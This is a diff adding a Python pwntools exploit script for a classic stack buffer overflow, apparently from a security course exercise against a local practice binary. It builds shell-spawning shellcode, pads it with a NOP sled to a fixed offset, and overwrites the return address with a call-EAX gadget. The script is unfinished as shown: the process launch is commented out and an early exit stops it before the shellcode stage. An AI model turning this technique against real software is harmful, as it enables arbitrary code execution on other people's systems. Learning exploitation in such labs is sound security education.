Python3 updates to exploit

Week9_Overflows/Classic_Overflows/exploit.py

@@ -0,0 +1,66 @@
+from pwn import *
+
+context(os='linux', arch='i386')
+context.log_level = "debug"
+
+# OFFSET to Control EIP
+OFFSET = 316
+
+TARGET = "./overflow"
+
+evil = shellcraft.sh()
+
+#print(evil)
+
+#import sys
+#sys.exit(0)
+
+# Load the Binary as a process
+#proc = process(TARGET)
+
+# Pause the Program to allow us to connect with GDB
+pause()
+
+# And Read the Data from it.
+out = proc.readuntil("Stack\n")
+print("First Line {0}".format(out))
+
+# Stage 1:  Find the offset.
+# Send our payload to the Target
+#proc.writeline(cyclic(44))
+
+# Stage 2: Confirm we have control of the Instruction pointer.
+payload = b"A"
+payload += b"B"*40
+payload += b"ZZZZ"
+#payload += b"\x90"*(OFFSET-4)
+#payload += b"CBBC"
+proc.writeline(payload)
+
+import sys
+sys.exit(0)
+
+#EAX ADDRESS IS 0xffffcdd0
+#EAX_ADDR = 0xffffcdd0
+
+#With Ret 2 Reg we can use call EAX
+# find this with $objdump -D | grep call | grep eax
+
+CALL_EAX = 0x8049019
+
+payload = b"\x90"*10
+payload += asm(evil)
+payload += b"\x90"*(OFFSET - len(payload))
+#payload += b"BBBB"
+#payload += p32(EAX_ADDR)
+payload += p32(CALL_EAX)
+
+
+print("SANITY CHECK ON PAYLOAD LEN {0}".format(len(payload)))
+proc.writeline(payload)
+
+# Get the response back
+proc.interactive()
+#out =proc.read()
+
+print("Second Line {0}".format(out))